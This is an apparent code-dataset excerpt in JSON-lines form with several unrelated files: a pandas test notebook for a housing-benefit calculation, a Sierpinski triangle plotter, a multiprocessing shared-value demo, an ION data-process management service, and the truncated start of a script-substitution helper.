hide_input=false\n# Import our dependencies\n\nimport os\nimport sys\nfrom pathlib import Path\nimport pytest\nimport pandas\nfrom pandas.testing import assert_frame_equal, assert_series_equal\n\nmodule_path = os.path.abspath('../')\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nfrom derived_variables.paidhb import calculate_paid_housing_benefit\n\ndef get_path(filename):\n return os.path.join(module_path, 'tests/fixtures', filename)\n\n# + [markdown] hide_input=false\n# ## Show function definition\n\n# +\n# calculate_paid_housing_benefit??\n# -\n\n# ## Set up our input data from a CSV fixture\n# This reads in a CSV of values and loads it into memory\n#\n\ninput_data = pandas.read_csv(get_path('input_paidhb.csv'), index_col=0)\ninput_data\n\n# ## Set up our expected result from a CSV fixture\n\nexpected_result = pandas.read_csv(get_path('expected_result_paidhb.csv'), index_col=0, squeeze=True)\nexpected_result\n\n# ## Run the model\n\nactual_result = calculate_paid_housing_benefit(input_data)\nactual_result\n\n# +\n# %%run_pytest[clean]\n\n# Check that our actual result matches our expected result\n\ndef test_apply_weighting():\n assert_frame_equal(actual_result, expected_result)\n\n\n# + hide_input=true\n__name__\n","sub_path":"modules/pandas/tests/test_paidhb.py","file_name":"test_paidhb.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"235293715","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Functions\ndef triangle(x, y, c):\n plt . fill([x, x + c, x + c / 2], [y, y, y + c * np.sqrt(3) / 2], \" b \")\n\n\ndef t2s(n, x, y, c):\n print(\"n:\", n, \" / x:\", x, \" / y:\", y, \" / c:\", c, sep='')\n if n == 0:\n triangle(x, y, c)\n else:\n t2s(n - 1, x, y, c / 2)\n t2s(n - 1, x + c / 2, y, c / 2)\n t2s(n - 1, x + c / 2, y + ((np.sqrt(3) / 2) / 2**n), c / 2)\n print()\n\n\n# Main\n\"\"\"\"triangle(0, 0, 0.5)\ntriangle(0.5, 0, 0.5)\ntriangle(0.25, np.sqrt(3) / 4, 0.5)\"\"\"\n\nn = eval(input(\"Niveau du TdS : \"))\nx = 0\ny = 0\nc = 1\nt2s(n, x, y, c)\n\nplt.show()\n","sub_path":"tp3/tp3ex6.py","file_name":"tp3ex6.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95037375","text":"from multiprocessing import Process, Value\nimport time, random\n\n# 创建共享内存\nmoney = Value('i', 10000)\n\n# 操作共享内存增加\ndef boy():\n for i in range(30):\n time.sleep(0.2)\n # 对value属性操作即对共享内存操作\n money.value += random.randint(1, 1000)\n\ndef girl():\n for i in range(30):\n time.sleep(0.16)\n money.value -= random.randint(100, 900)\n\nb = Process(target=boy)\ng = Process(target=girl)\nb.start()\ng.start()\nb.join()\ng.join()\n\nprint('月余额:', money.value)\n\nmoney.value = 12000\nprint(money.value) # 打印字符串\n","sub_path":"day7/value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356031464","text":"#!/usr/bin/env python\n\n\"\"\"\n@package ion.services.sa.process.test.test_int_data_process_management_service\n@author Maurice Manning\n\"\"\"\nfrom uuid import uuid4\n\nfrom pyon.util.log import log\nfrom pyon.util.ion_time import IonTime\nfrom pyon.public import RT, PRED, OT, LCS\nfrom pyon.core.bootstrap import IonObject\nfrom pyon.core.exception import BadRequest, NotFound\nfrom pyon.util.containers import create_unique_identifier\nfrom pyon.util.containers import DotDict\nfrom pyon.util.arg_check import validate_is_not_none, validate_true\nfrom pyon.ion.resource import ExtendedResourceContainer\nfrom interface.objects import ProcessDefinition\n\nfrom interface.services.sa.idata_process_management_service import BaseDataProcessManagementService\nfrom interface.services.sa.idata_product_management_service import DataProductManagementServiceClient\n\nfrom ion.services.sa.instrument.data_process_impl import DataProcessImpl\n\nfrom ion.util.module_uploader import RegisterModulePreparerPy\nimport os\nimport pwd\n\nclass DataProcessManagementService(BaseDataProcessManagementService):\n\n def on_init(self):\n IonObject(\"Resource\") # suppress pyflakes error\n\n self.override_clients(self.clients)\n\n self.init_module_uploader()\n\n self.get_unique_id = (lambda : uuid4().hex)\n\n def init_module_uploader(self):\n if self.CFG:\n #looking for forms like host=amoeba.ucsd.edu, remotepath=/var/www/release, user=steve\n cfg_host = self.CFG.get_safe(\"service.data_process_management.process_release_host\", None)\n cfg_remotepath = self.CFG.get_safe(\"service.data_process_management.process_release_directory\", None)\n cfg_user = self.CFG.get_safe(\"service.data_process_management.process_release_user\",\n pwd.getpwuid(os.getuid())[0])\n cfg_wwwprefix = self.CFG.get_safe(\"service.data_process_management.process_release_wwwprefix\", None)\n\n if cfg_host is None or cfg_remotepath is None or cfg_wwwprefix is None:\n raise BadRequest(\"Missing configuration items; host='%s', directory='%s', wwwprefix='%s'\" %\n (cfg_host, cfg_remotepath, cfg_wwwprefix))\n\n self.module_uploader = RegisterModulePreparerPy(dest_user=cfg_user,\n dest_host=cfg_host,\n dest_path=cfg_remotepath,\n dest_wwwprefix=cfg_wwwprefix)\n\n\n def override_clients(self, new_clients):\n \"\"\"\n Replaces the service clients with a new set of them... and makes sure they go to the right places\n \"\"\"\n\n #shortcut names for the import sub-services\n if hasattr(self.clients, \"resource_registry\"):\n self.RR = self.clients.resource_registry\n\n #farm everything out to the impls\n\n self.data_process = DataProcessImpl(self.clients)\n\n\n #todo: need to know what object will be worked with here\n def register_data_process_definition(self, process_code=''):\n \"\"\"\n register a process module by putting it in a web-accessible location\n\n @process_code a base64-encoded python file\n \"\"\"\n\n# # retrieve the resource\n# data_process_definition_obj = self.clients.resource_registry.read(data_process_definition_id)\n\n dest_filename = \"process_code_%s.py\" % self.get_unique_id() #data_process_definition_obj._id\n\n #process the input file (base64-encoded .py)\n uploader_obj, err = self.module_uploader.prepare(process_code, dest_filename)\n if None is uploader_obj:\n raise BadRequest(\"Process code failed validation: %s\" % err)\n\n # actually upload\n up_success, err = uploader_obj.upload()\n if not up_success:\n raise BadRequest(\"Upload failed: %s\" % err)\n\n# #todo: save module / class?\n# data_process_definition_obj.uri = uploader_obj.get_destination_url()\n# self.clients.resource_registry.update(data_process_definition_obj)\n\n return uploader_obj.get_destination_url()\n\n def create_data_process_definition(self, data_process_definition=None):\n\n result, _ = self.clients.resource_registry.find_resources(RT.DataProcessDefinition, None, data_process_definition.name, True)\n\n validate_true( len(result) ==0, \"A data process definition named '%s' already exists\" % data_process_definition.name)\n\n #todo: determine validation checks for a data process def\n data_process_definition_id, version = self.clients.resource_registry.create(data_process_definition)\n\n #-------------------------------\n # Process Definition\n #-------------------------------\n # Create the underlying process definition\n process_definition = ProcessDefinition()\n process_definition.name = data_process_definition.name\n process_definition.description = data_process_definition.description\n\n process_definition.executable = {'module':data_process_definition.module, 'class':data_process_definition.class_name}\n process_definition_id = self.clients.process_dispatcher.create_process_definition(process_definition=process_definition)\n\n self.clients.resource_registry.create_association(data_process_definition_id, PRED.hasProcessDefinition, process_definition_id)\n\n return data_process_definition_id\n\n def update_data_process_definition(self, data_process_definition=None):\n # TODO: If executable has changed, update underlying ProcessDefinition\n\n # Overwrite DataProcessDefinition object\n self.clients.resource_registry.update(data_process_definition)\n\n def read_data_process_definition(self, data_process_definition_id=''):\n data_proc_def_obj = self.clients.resource_registry.read(data_process_definition_id)\n return data_proc_def_obj\n\n def delete_data_process_definition(self, data_process_definition_id=''):\n\n self.clients.resource_registry.retire(data_process_definition_id)\n\n def force_delete_data_process_definition(self, data_process_definition_id=''):\n\n processdef_ids, _ = self.clients.resource_registry.find_objects(subject=data_process_definition_id, predicate=PRED.hasProcessDefinition, object_type=RT.ProcessDefinition, id_only=True)\n self._remove_associations(data_process_definition_id)\n self.clients.resource_registry.delete(data_process_definition_id)\n for processdef_id in processdef_ids:\n self.clients.process_dispatcher.delete_process_definition(processdef_id)\n\n\n def find_data_process_definitions(self, filters=None):\n \"\"\"\n @param filters: dict of parameters to filter down\n the list of possible data proc.\n @retval\n \"\"\"\n #todo: add filtering\n data_process_def_list , _ = self.clients.resource_registry.find_resources(RT.DataProcessDefinition, None, None, True)\n return data_process_def_list\n\n def assign_input_stream_definition_to_data_process_definition(self, stream_definition_id='', data_process_definition_id=''):\n \"\"\"Connect the input stream with a data process definition\n \"\"\"\n # Verify that both ids are valid, RR will throw if not found\n stream_definition_obj = self.clients.resource_registry.read(stream_definition_id)\n data_process_definition_obj = self.clients.resource_registry.read(data_process_definition_id)\n\n validate_is_not_none(stream_definition_obj, \"No stream definition object found for stream definition id: %s\" % stream_definition_id)\n validate_is_not_none(data_process_definition_obj, \"No data process definition object found for data process\" \\\n \" definition id: %s\" % data_process_definition_id)\n\n self.clients.resource_registry.create_association(data_process_definition_id, PRED.hasInputStreamDefinition, stream_definition_id)\n\n def unassign_input_stream_definition_from_data_process_definition(self, stream_definition_id='', data_process_definition_id=''):\n \"\"\"\n Disconnect the Data Product from the Data Producer\n\n @param stream_definition_id str\n @param data_process_definition_id str\n @throws NotFound object with specified id does not exist\n \"\"\"\n\n # Remove the link between the Stream Definition resource and the Data Process Definition resource\n associations = self.clients.resource_registry.find_associations(data_process_definition_id, PRED.hasInputStreamDefinition, stream_definition_id, id_only=True)\n validate_is_not_none(associations, \"No Input Stream Definitions associated with data process definition ID \" + str(data_process_definition_id))\n\n for association in associations:\n self.clients.resource_registry.delete_association(association)\n\n def assign_stream_definition_to_data_process_definition(self, stream_definition_id='', data_process_definition_id='', binding=''):\n \"\"\"Connect the output stream with a data process definition\n \"\"\"\n # Verify that both ids are valid, RR will throw if not found\n stream_definition_obj = self.clients.resource_registry.read(stream_definition_id)\n data_process_definition_obj = self.clients.resource_registry.read(data_process_definition_id)\n\n validate_is_not_none(stream_definition_obj, \"No stream definition object found for stream definition id: %s\" % stream_definition_id)\n validate_is_not_none(data_process_definition_obj, \"No data process definition object found for data process\"\\\n \" definition id: %s\" % data_process_definition_id)\n\n self.clients.resource_registry.create_association(data_process_definition_id, PRED.hasStreamDefinition, stream_definition_id)\n data_process_definition_obj.output_bindings[binding] = stream_definition_id\n self.clients.resource_registry.update(data_process_definition_obj)\n\n def unassign_stream_definition_from_data_process_definition(self, stream_definition_id='', data_process_definition_id=''):\n \"\"\"\n Disconnect the Data Product from the Data Producer\n\n @param stream_definition_id str\n @param data_process_definition_id str\n @throws NotFound object with specified id does not exist\n \"\"\"\n\n # Remove the link between the Stream Definition resource and the Data Process Definition resource\n associations = self.clients.resource_registry.find_associations(data_process_definition_id, PRED.hasStreamDefinition, stream_definition_id, id_only=True)\n\n validate_is_not_none(associations, \"No Stream Definitions associated with data process definition ID \" + str(data_process_definition_id))\n for association in associations:\n self.clients.resource_registry.delete_association(association)\n\n\n # ------------------------------------------------------------------------------------------------\n # Working with DataProcess\n\n def create_data_process(self, data_process_definition_id='', in_data_product_ids=None, out_data_products=None, configuration=None):\n \"\"\"\n @param data_process_definition_id: Object with definition of the\n process to apply to the input data product\n @param in_data_product_ids: ID of the input data products\n @param out_data_products: list of IDs of the output data products\n @retval data_process_id: ID of the newly created data process object\n \"\"\"\n\n inform = \"Input Data Product: \"+str(in_data_product_ids)+\\\n \"\\nTransformed by: \"+str(data_process_definition_id)+\\\n \"\\nTo create output Product: \"+str(out_data_products) + \"\\n\"\n log.debug(\"DataProcessManagementService:create_data_process() method called with parameters:\\n\" +\n inform)\n\n #---------------------------------------------------------------------------------------\n # Initialize\n #---------------------------------------------------------------------------------------\n\n configuration = configuration or DotDict()\n\n validate_is_not_none( out_data_products, \"No output data products passed in\")\n\n #---------------------------------------------------------------------------------------\n # Read the data process definition\n #---------------------------------------------------------------------------------------\n data_process_definition = self.read_data_process_definition(data_process_definition_id)\n\n #---------------------------------------------------------------------------------------\n # Read the output bindings from the definition\n #---------------------------------------------------------------------------------------\n\n output_bindings = data_process_definition.output_bindings\n\n #---------------------------------------------------------------------------------------\n # Find the process definition associated with this data process definition.\n # From the process definition, we can get the module and class to run....\n #---------------------------------------------------------------------------------------\n\n procdef_ids,_ = self.clients.resource_registry.find_objects(data_process_definition_id, PRED.hasProcessDefinition, RT.ProcessDefinition, id_only=True)\n if not procdef_ids:\n raise BadRequest(\"Cannot find associated ProcessDefinition for DataProcessDefinition id=%s\" % data_process_definition_id)\n\n process_definition_id = procdef_ids[0]\n\n #---------------------------------------------------------------------------------------\n # Create a data process object and register it\n #---------------------------------------------------------------------------------------\n\n # get the name of the data process and create an IONObject for it\n data_process_name = create_unique_identifier(\"process_\" + data_process_definition.name)\n data_process_obj = IonObject(RT.DataProcess, name=data_process_name)\n\n # register the data process\n data_process_id, version = self.clients.resource_registry.create(data_process_obj)\n\n data_process_obj = self.clients.resource_registry.read(data_process_id)\n\n #---------------------------------------------------------------------------------------\n # Make the necessary associations, registering\n #---------------------------------------------------------------------------------------\n\n #todo check if this assoc is needed?\n # Associate the data process with the data process definition\n self.clients.resource_registry.create_association(data_process_id, PRED.hasProcessDefinition, data_process_definition_id)\n\n # Register the data process instance as a data producer with DataAcquisitionMgmtSvc\n data_producer_id = self.clients.data_acquisition_management.register_process(data_process_id)\n log.debug(\"DataProcessManagementService:create_data_process register process \"\n \"with DataAcquisitionMgmtSvc: data_producer_id: %s (L4-CI-SA-RQ-181)\", str(data_producer_id) )\n\n #---------------------------------------------------------------------------------------\n # Register each output data product with DAMS to create DataProducer links\n #---------------------------------------------------------------------------------------\n output_stream_dict = {}\n\n if out_data_products is None:\n raise BadRequest(\"Data Process must have output product(s) specified %s\", str(data_process_definition_id) )\n\n for binding, output_data_product_id in out_data_products.iteritems():\n\n # check that the product is not already associated with a producer\n producer_ids, _ = self.clients.resource_registry.find_objects(output_data_product_id, PRED.hasDataProducer, RT.DataProducer, True)\n if producer_ids:\n raise BadRequest(\"Data Product should not already be associated to a DataProducer %s hasDataProducer %s\", str(data_process_id), str(producer_ids[0]))\n\n #Assign each output Data Product to this producer resource\n output_data_product_obj = self.clients.resource_registry.read(output_data_product_id)\n if not output_data_product_obj:\n raise NotFound(\"Output Data Product %s does not exist\" % output_data_product_id)\n\n # Associate with DataProcess: register as an output product for this process\n log.debug(\"Link data process %s and output out data product: %s (L4-CI-SA-RQ-260)\", str(data_process_id), str(output_data_product_id))\n self.clients.data_acquisition_management.assign_data_product(input_resource_id= data_process_id,data_product_id= output_data_product_id)\n\n # Retrieve the id of the OUTPUT stream from the out Data Product\n stream_ids, _ = self.clients.resource_registry.find_objects(output_data_product_id, PRED.hasStream, RT.Stream, True)\n\n if not stream_ids:\n raise NotFound(\"No Stream created for output Data Product \" + str(output_data_product_id))\n\n if len(stream_ids) != 1:\n raise BadRequest(\"Data Product should only have ONE stream at this time\" + str(output_data_product_id))\n\n output_stream_dict[binding] = stream_ids[0]\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n #Check for attached objects and put them into the configuration\n #------------------------------------------------------------------------------------------------------------------------------------------\n\n # check for attachments in data process definition\n configuration = self._find_lookup_tables(data_process_definition_id, configuration)\n input_stream_ids = []\n\n if in_data_product_ids:\n for in_data_product_id in in_data_product_ids:\n\n self.clients.resource_registry.create_association(data_process_id, PRED.hasInputProduct, in_data_product_id)\n log.debug(\"Associate data process workflows with source data products %s \"\n \"hasInputProducts %s (L4-CI-SA-RQ-260)\", str(data_process_id), str(in_data_product_ids))\n\n #check if in data product is attached to an instrument, check instrumentDevice and InstrumentModel for lookup table attachments\n instdevice_ids, _ = self.clients.resource_registry.find_subjects(RT.InstrumentDevice, PRED.hasOutputProduct, in_data_product_id, True)\n\n for instdevice_id in instdevice_ids:\n log.debug(\"Instrument device_id assoc to the input data product of this data process: %s (L4-CI-SA-RQ-231)\", str(instdevice_id))\n\n # check for attachments in instrument device\n configuration = self._find_lookup_tables(instdevice_id, configuration)\n instmodel_ids, _ = self.clients.resource_registry.find_objects(instdevice_id, PRED.hasModel, RT.InstrumentModel, True)\n\n for instmodel_id in instmodel_ids:\n # check for attachments in instrument model\n configuration = self._find_lookup_tables(instmodel_id, configuration)\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n # Get the input stream from the input_data_product, which should already be associated with a stream via the Data Producer\n #------------------------------------------------------------------------------------------------------------------------------------------\n input_stream_ids = self._get_input_stream_ids(in_data_product_ids)\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n # Create subscription to the input stream\n #------------------------------------------------------------------------------------------------------------------------------------------\n input_subscription_id = self.clients.pubsub_management.create_subscription(name=data_process_name, stream_ids=input_stream_ids)\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n # Add the subscription id to the data process\n #------------------------------------------------------------------------------------------------------------------------------------------\n data_process_obj.input_subscription_id = input_subscription_id\n\n log.info(\"Launching the process\")\n debug_str = \"\\n\\tQueue Name: %s\\n\\tOutput Streams: %s\\n\\tProcess Definition ID: %s\\n\\tConfiguration: %s\" % (data_process_name, output_stream_dict, process_definition_id, configuration)\n log.debug(debug_str)\n\n pid = self._launch_process(\n queue_name=data_process_name,\n out_streams=output_stream_dict,\n process_definition_id=process_definition_id,\n configuration=configuration)\n\n data_process_obj.process_id = pid\n self.clients.resource_registry.update(data_process_obj)\n return data_process_id\n\n def _get_input_stream_ids(self, in_data_product_ids = None):\n\n input_stream_ids = []\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n # get the streams associated with this IN data products\n #------------------------------------------------------------------------------------------------------------------------------------------\n for in_data_product_id in in_data_product_ids:\n\n # Get the stream associated with this input data product\n stream_ids, _ = self.clients.resource_registry.find_objects(in_data_product_id, PRED.hasStream, RT.Stream, True)\n\n validate_is_not_none( stream_ids, \"No Stream created for this input Data Product \" + str(in_data_product_id))\n validate_is_not_none( len(stream_ids) != 1, \"Input Data Product should only have ONE stream\" + str(in_data_product_id))\n\n # We take for now one stream_id associated with each input data product\n input_stream_ids.append(stream_ids[0])\n\n return input_stream_ids\n\n def _launch_process(self, queue_name='', out_streams=None, process_definition_id='', configuration=None):\n \"\"\"\n Launches the process\n \"\"\"\n\n # ------------------------------------------------------------------------------------\n # Spawn Configuration and Parameters\n # ------------------------------------------------------------------------------------\n\n configuration['process'] = {\n 'queue_name':queue_name,\n 'publish_streams' : out_streams\n }\n\n # ------------------------------------------------------------------------------------\n # Process Spawning\n # ------------------------------------------------------------------------------------\n # Spawn the process\n pid = self.clients.process_dispatcher.schedule_process(\n process_definition_id=process_definition_id,\n configuration=configuration\n )\n validate_is_not_none( pid, \"Process could not be spawned\")\n\n return pid\n\n\n def _find_lookup_tables(self, resource_id=\"\", configuration=None):\n #check if resource has lookup tables attached\n\n configuration = configuration or DotDict()\n\n attachment_objs, _ = self.clients.resource_registry.find_objects(resource_id, PRED.hasAttachment, RT.Attachment, False)\n\n for attachment_obj in attachment_objs:\n\n words = set(attachment_obj.keywords)\n\n if 'DataProcessInput' in words:\n configuration[attachment_obj.name] = attachment_obj.content\n log.debug(\"Lookup table, %s, found in attachment %s\" % (attachment_obj.content, attachment_obj.name))\n else:\n log.debug(\"NO lookup table in attachment %s\" % attachment_obj.name)\n\n return configuration\n\n def update_data_process_inputs(self, data_process_id=\"\", in_stream_ids=None):\n #@TODO: INPUT STREAM VALIDATION\n log.debug(\"Updating inputs to data process '%s'\", data_process_id)\n data_process_obj = self.clients.resource_registry.read(data_process_id)\n subscription_id = data_process_obj.input_subscription_id\n was_active = False \n if subscription_id:\n # get rid of all the current streams\n try:\n log.debug(\"Deactivating subscription '%s'\", subscription_id)\n self.clients.pubsub_management.deactivate_subscription(subscription_id)\n was_active = True\n\n except BadRequest:\n log.info('Subscription was not active')\n\n self.clients.pubsub_management.delete_subscription(subscription_id)\n\n new_subscription_id = self.clients.pubsub_management.create_subscription(data_process_obj.name,\n stream_ids=in_stream_ids)\n data_process_obj.input_subscription_id = new_subscription_id\n\n self.clients.resource_registry.update(data_process_obj)\n\n if was_active:\n log.debug(\"Activating subscription '%s'\", new_subscription_id)\n self.clients.pubsub_management.activate_subscription(new_subscription_id)\n\n \n\n def update_data_process(self,):\n #todo: What are valid ways to update a data process?.\n\n return\n\n def read_data_process(self, data_process_id=\"\"):\n\n data_proc_obj = self.clients.resource_registry.read(data_process_id)\n return data_proc_obj\n\n\n def delete_data_process(self, data_process_id=\"\"):\n\n # Delete the specified DataProcessDefinition object\n data_process_obj = self.read_data_process(data_process_id)\n\n log.debug(\"delete the association with DataProcessDefinition\")\n dpd_assn_ids = self.clients.resource_registry.find_associations(subject=data_process_id, predicate=PRED.hasProcessDefinition, id_only=True)\n for dpd_assn_id in dpd_assn_ids:\n self.clients.resource_registry.delete_association(dpd_assn_id)\n\n self._stop_process(data_process_obj)\n\n\n log.debug(\"Finalizing data products by removing streams associated with the dataset and product\")\n out_products, assocs = self.clients.resource_registry.find_objects(subject=data_process_id, predicate=PRED.hasOutputProduct, id_only=True)\n for out_product, assoc in zip(out_products, assocs):\n data_product_management = DataProductManagementServiceClient()\n data_product_management.remove_streams(out_product)\n log.debug(\"deleting association with output data product '%s'\" % out_product)\n self.clients.resource_registry.delete_association(assoc)\n\n self.clients.data_acquisition_management.unassign_data_product(data_process_id, out_product)\n\n\n log.debug(\"Delete the input product links\")\n inprod_associations = self.clients.resource_registry.find_associations(data_process_id, PRED.hasInputProduct)\n for inprod_association in inprod_associations:\n self.clients.resource_registry.delete_association(inprod_association)\n\n\n try:\n self.deactivate_data_process(data_process_id=data_process_id)\n log.warn('Deleteing activated data process...')\n except BadRequest:\n pass\n\n subscription_id = data_process_obj.input_subscription_id\n self.clients.pubsub_management.delete_subscription(subscription_id)\n data_process_obj.input_subscription_id = None\n\n #unregister the data process in DataAcquisitionMgmtSvc\n self.clients.data_acquisition_management.unregister_process(data_process_id)\n\n # Delete the data process\n self.clients.resource_registry.retire(data_process_id)\n return\n\n def force_delete_data_process(self, data_process_id=\"\"):\n\n # if not yet deleted, the first execute delete logic\n dp_obj = self.read_data_process(data_process_id)\n if dp_obj.lcstate != LCS.RETIRED:\n self.delete_data_process(data_process_id)\n\n self._remove_associations(data_process_id)\n self.clients.resource_registry.delete(data_process_id)\n\n def _stop_process(self, data_process):\n log.debug(\"stopping data process '%s'\" % data_process.process_id)\n pid = data_process.process_id\n self.clients.process_dispatcher.cancel_process(pid)\n\n\n def find_data_process(self, filters=None):\n \"\"\"\n @param filters: dict of parameters to filter down\n the list of possible data proc.\n @retval\n \"\"\"\n #todo: add filter processing\n data_process_list , _ = self.clients.resource_registry.find_resources(RT.DataProcess, None, None, True)\n return data_process_list\n\n def activate_data_process(self, data_process_id=\"\"):\n\n data_process_obj = self.read_data_process(data_process_id)\n log.debug(\"activate_data_process:data_process_obj %s \", str(data_process_obj))\n\n\n# #update the producer context with the activation time and the configuration\n\n\n # todo: update the setting of this context with the return vals from process_dispatcher:schedule_process after convert\n # todo: process_id, process_definition, schedule, configuration\n\n producer_obj = self._get_process_producer(data_process_id)\n producertype = type(producer_obj).__name__\n #todo: producer_obj.producer_context.type_ is returning the base type, not the derived type.\n if producer_obj.producer_context.type_ == OT.DataProcessProducerContext :\n log.debug(\"activate_data_process:activation_time %s \", str(IonTime().to_string()))\n producer_obj.producer_context.activation_time = IonTime().to_string()\n producer_obj.producer_context.configuration = data_process_obj.configuration\n self.clients.resource_registry.update(producer_obj)\n\n subscription_id = data_process_obj.input_subscription_id\n self.clients.pubsub_management.activate_subscription(subscription_id=subscription_id)\n\n def deactivate_data_process(self, data_process_id=\"\"):\n\n data_process_obj = self.read_data_process(data_process_id)\n\n if not data_process_obj.input_subscription_id:\n log.warn(\"data process '%s' has no subscription id to deactivate\", data_process_id)\n return\n\n subscription_obj = self.clients.pubsub_management.read_subscription(data_process_obj.input_subscription_id)\n\n if subscription_obj.activated:\n\n #update the producer context with the deactivation time\n # todo: update the setting of this contect with the return vals from process_dispatcher:schedule_process after convert\n producer_obj = self._get_process_producer(data_process_id)\n producertype = type(producer_obj).__name__\n if producer_obj.producer_context.type_ == OT.DataProcessProducerContext :\n log.debug(\"data_process '%s' (producer '%s'): deactivation_time = %s \",\n data_process_id, producer_obj._id, str(IonTime().to_string()))\n producer_obj.producer_context.deactivation_time = IonTime().to_string()\n self.clients.resource_registry.update(producer_obj)\n\n subscription_id = data_process_obj.input_subscription_id\n log.debug(\"Deactivating subscription '%s'\", subscription_id)\n self.clients.pubsub_management.deactivate_subscription(subscription_id=subscription_id)\n\n\n\n def attach_process(self, process=''):\n \"\"\"\n @param process: Should this be the data_process_id?\n @retval\n \"\"\"\n # TODO: Determine the proper input param\n pass\n\n def _get_process_producer(self, data_process_id=\"\"):\n producer_objs, _ = self.clients.resource_registry.find_objects(subject=data_process_id, predicate=PRED.hasDataProducer, object_type=RT.DataProducer, id_only=False)\n if not producer_objs:\n raise NotFound(\"No Producers created for this Data Process \" + str(data_process_id))\n return producer_objs[0]\n\n\n ############################\n #\n # EXTENDED RESOURCES\n #\n ############################\n\n\n\n def get_data_process_definition_extension(self, data_process_definition_id='', ext_associations=None, ext_exclude=None):\n #Returns an DataProcessDefinition Extension object containing additional related information\n\n if not data_process_definition_id:\n raise BadRequest(\"The data_process_definition_id parameter is empty\")\n\n extended_resource_handler = ExtendedResourceContainer(self)\n\n extended_data_process_definition = extended_resource_handler.create_extended_resource_container(\n extended_resource_type=OT.DataProcessDefinitionExtension,\n resource_id=data_process_definition_id,\n computed_resource_type=OT.DataProcessDefinitionComputedAttributes,\n ext_associations=ext_associations,\n ext_exclude=ext_exclude)\n\n #Loop through any attachments and remove the actual content since we don't need\n # to send it to the front end this way\n #TODO - see if there is a better way to do this in the extended resource frame work.\n if hasattr(extended_data_process_definition, 'attachments'):\n for att in extended_data_process_definition.attachments:\n if hasattr(att, 'content'):\n delattr(att, 'content')\n\n return extended_data_process_definition\n\n def get_data_process_extension(self, data_process_id='', ext_associations=None, ext_exclude=None):\n #Returns an DataProcessDefinition Extension object containing additional related information\n\n if not data_process_id:\n raise BadRequest(\"The data_process_definition_id parameter is empty\")\n\n extended_resource_handler = ExtendedResourceContainer(self)\n\n extended_data_process = extended_resource_handler.create_extended_resource_container(\n extended_resource_type=OT.DataProcessExtension,\n resource_id=data_process_id,\n computed_resource_type=OT.DataProcessComputedAttributes,\n ext_associations=ext_associations,\n ext_exclude=ext_exclude)\n\n #Loop through any attachments and remove the actual content since we don't need\n # to send it to the front end this way\n #TODO - see if there is a better way to do this in the extended resource frame work.\n if hasattr(extended_data_process, 'attachments'):\n for att in extended_data_process.attachments:\n if hasattr(att, 'content'):\n delattr(att, 'content')\n\n return extended_data_process\n\n\n def _remove_associations(self, resource_id=''):\n \"\"\"\n delete all associations to/from a resource\n \"\"\"\n\n # find all associations where this is the subject\n _, obj_assns = self.clients.resource_registry.find_objects(subject=resource_id, id_only=True)\n\n # find all associations where this is the object\n _, sbj_assns = self.clients.resource_registry.find_subjects(object=resource_id, id_only=True)\n\n log.debug(\"pluck will remove %s subject associations and %s object associations\",\n len(sbj_assns), len(obj_assns))\n\n for assn in obj_assns:\n log.debug(\"pluck deleting object association %s\", assn)\n self.clients.resource_registry.delete_association(assn)\n\n for assn in sbj_assns:\n log.debug(\"pluck deleting subject association %s\", assn)\n self.clients.resource_registry.delete_association(assn)\n\n # find all associations where this is the subject\n _, obj_assns = self.clients.resource_registry.find_objects(subject=resource_id, id_only=True)\n\n # find all associations where this is the object\n _, sbj_assns = self.clients.resource_registry.find_subjects(object=resource_id, id_only=True)\n\n log.debug(\"post-deletions, pluck found %s subject associations and %s object associations\",\n len(sbj_assns), len(obj_assns))\n","sub_path":"ion/services/sa/process/data_process_management_service.py","file_name":"data_process_management_service.py","file_ext":"py","file_size_in_byte":36908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493605072","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nSistemi Corporation, copyright, all rights reserved, 2023\nMartin Guthrie\n\nThis is a helper script to test scripts that contain substitutions.\nNormally CLI prism_dev.py will not run a script with substitutions.\nUse this script to process a script that has substitutions and save\na new script that has processed substitutions.\n\nNOTE: the substitutions must be \"set\" within this script below.\n See the # !! MODIFY !! section line ~150\n\n\"\"\"\nimport os\nimport re\nimport json\nimport jstyleson\nimport argparse\n\nimport logging\nlogger = logging.getLogger(\"subs\")\n\n\nSCRIPT_REPLACE_RE = r'\\\"%%.*?\\\"' # \"%%Text\"\n\n\ndef find_sub_items(script_text):\n \"\"\" find items in the script text that are marked for substitution from user input\n The format of fields to be found is \"%%Text\"\n :param script_text:\n :return: a dict of items to be replaced in script\n \"\"\"\n matches = re.finditer(SCRIPT_REPLACE_RE, script_text, re.MULTILINE)\n items = [item.group() for item in matches]\n return list(dict.fromkeys(items)) # removes duplicates\n\n\ndef find_sub_items_replace(script_text, replacements):\n \"\"\" Replace '%%Name' items in script from replacements\n\n - replacements that are of type \"num\", also need to remove surrounding quotes,\n a bit of a hack to do it here, but thats where we are...\n\n :param script_text:\n :param replacements: list of replacement dicts, [{'Lot': '12345'}, ...]\n :return:\n \"\"\"\n script = jstyleson.loads(script_text)\n script_subs = script.pop(\"subs\", {})\n logger.debug(script_subs)\n logger.info(replacements)\n\n def _sub_replace(k, v, t):\n # In order to do the subs correctly, we need to know if the sub is\n # a string or a num, to know whether the quotes (\"\") should be removed or not.\n if t == \"num\":\n return script_text.replace('\"%%{}\"'.format(k), str(v))\n else:\n return script_text.replace(\"%%{}\".format(k), str(v))\n\n for r in replacements:\n for k, v in r.items():\n\n if k not in script_subs:\n logger.error(f\"{k} not in script subs\")\n return None\n\n if not isinstance(v, str):\n logger.error(f\"sub {k} value {v} must be a string\")\n return None\n\n logger.info(f\"{k} -> {v}\")\n script_text = _sub_replace(k, v, 